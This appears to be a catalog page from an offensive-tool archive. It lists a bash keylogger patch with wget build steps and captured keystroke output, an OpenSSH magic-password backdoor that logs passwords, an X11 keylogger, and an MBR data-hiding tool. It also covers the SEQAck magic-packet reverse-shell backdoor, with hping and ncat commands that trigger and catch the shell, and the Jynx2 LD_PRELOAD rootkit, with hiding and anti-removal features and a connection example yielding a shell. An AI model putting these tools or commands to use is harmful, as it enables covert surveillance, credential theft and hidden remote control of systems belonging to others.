SSH Back is a set of shell scripts that assist you in shuffling an ssh connection over socat and ssl.
A keylogger tool consisting of a set of patches for bash plus a helper command; it captures the input of all logged-in users and sends it into FIFOs, from which the keystrokes can be monitored in real time.
1. get bash-3.0.tar.gz
2. tar xzvf bash-3.0.tar.gz
3. cd bash-3.0
4. wget http://www.chollian.net/~jyj9782/geinblues/stuff/bash-geinpeek/bash-3.0-geinpeek-0.2.tar.gz
5. tar xzvf bash-3.0-geinpeek-0.2.tar.gz
6. patch < Makefile.in-geinpeek.diff
7. patch < [patch file name you want to add]
Patch kit list:
- execute_cmd.c-geinpeek.diff ( not stable yet )
- shell.c-geinpeek.diff ( not good )
May the force be with you, man ~
NEW FEATURE:
[root@elizabeth bash-3.0]# ./ghelper s.txt
[BASH-GEINPEEK MONITOR]
[Hint: when if you have to stop it 'CTRL+C']
Mon Feb 13 03:20:53 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty -al
Mon Feb 13 03:20:53 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty
Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ./script.sh
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ls
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ ls
!s! Mon Feb 13 03:20:55 2006 - [file@/dev/pts/38 /tmp]$ whoami
[root@elizabeth bash-3.0]# ./ghelper s.txt -i
[BASH-GEINPEEK MONITOR]
[Hint: when if you have to stop it 'CTRL+C']
Mon Feb 13 03:21:01 2006 - [file@/dev/pts/38 /tmp]$ ./script.sh
Mon Feb 13 03:21:02 2006 - [file@/dev/pts/38 /tmp]$ ls --color=tty
Mon Feb 13 03:21:03 2006 - [file@/dev/pts/38 /tmp]$ clear
The command logs marked !s! above were executed from inside a shell script; the -i flag of ghelper suppresses those script-originated entries from its output.
This script provides OpenSSH backdoor functionality with a magic password and logs passwords as well. It leverages the same basic idea behind common OpenSSH patches but this script attempts to make the process version agnostic. Use at your own risk.
Description:
XKeylog is an X11 keylogger for Unix that uses Xlib to interact with the user's keyboard. XKeylog listens for certain X11 events and then triggers specific routines to handle them.
MD5:
39e280cd02a3f01dffa1c6cae8e5b17e
Author:
Cyneox
This tool stores up to 426 bytes in the MBR's bootloader code section of unused devices such as USB drives, hard disks (which are not supposed to boot) and other media. GRUB detection is implemented for safety reasons; Windows bootloader code will be shamelessly overwritten.
INSTALLATION
make
sudo make install
make clean
FIRST STEPS
Get yourself a copy of your own MBR with
dd if=/dev/sdx of=my_mbr.img count=1
or use one of the provided samples in doc/.
Read, store and check your results with your favorite hex editor (e.g. ghex2).
Be careful not to damage your bootloader!
Run fdisk -l or dmesg to determine the correct device.
AUTHOR
atzeton
nullsecurity.net
LICENSE
GNU GPLv2+
SEQAck is an SSL-encrypted, magic-packet-triggered reverse connect backdoor application. I wrote this as part of the original Jynx-Kit LD_PRELOAD rootkit, as released by the Blackhat Library. With the second installment of the rootkit, we moved away from the stand-alone reverse connection backdoor and decided to hook the accept() system call instead. Not only was it simply to demonstrate another example of creating a backdoor, but it also fit perfectly with what we were doing: making things more modular.
This backdoor silently sniffs on the given interface for all incoming TCP packets. It relies on two defined rules, MAGIC_SEQ and MAGIC_ACK, which are easily manipulated in the TCP headers. Once the magic packet is received, it initiates an SSL encrypted reverse connecting shell to the host that sent the packet, on the given source port. For example, we can initiate the reverse connect with the following hping command.
# hping -M 0xdead -L 0xbeef google.com -s 5000 -c 1
Notice that the source port is 5000, SEQ (-M) is 0xdead and ACK (-L) is 0xbeef. With this example, we'd also need the following nc (the netcat supplied with nmap) running in the background to accept the incoming connection.
# nc -l -p 5000 --ssl
And there you have it: the reverse connect shell was successful, and you're in complete control. The idea of using SEQ/ACK values could be applied to a single-packet port knock sequence as well, so this application could easily be tweaked or expanded upon based on your requirements.
Jynx2 is an expansion of the original Jynx LD_Preload rootkit written in C with several modifications for multi-factor authentication, a more compatible shell drop, and additional hiding features.
Features:
Hiding from netstat
Hiding from ps/top and /proc
File hiding
SSL connect accept() hook
Multi-factor authentication
Improved anti-removal features
SUID Drop-shell with environment variable
Protip: It is possible to make Jynx2 even more difficult to remove by hooking the C library's link() function; therefore we recommend that any LD_Preload rootkit be removed using a LiveCD.
Usage:
Once Jynx2 is successfully installed on a target machine, accessing its accept() hook with the default configuration looks like:
[user@host ~]$ sudo ncat exploit.net 80 -p 42 --ssl
DEFAULT_PASS
Bump with shell.
>ls -lia
214473 drwxr-xr-x 2 user users 176 Mar 7 19:19 .
177137 drwxr-xr-x 15 user users 952 Mar 5 22:15 ..
Protip: Make sure to use the --ssl flag with ncat, otherwise Jynx2 will not accept the connection and the connection's file descriptor will be passed to the backdoored service instead.
An FTP-like client to access SMB/CIFS resources on servers. This tool is part of the Linux Samba suite.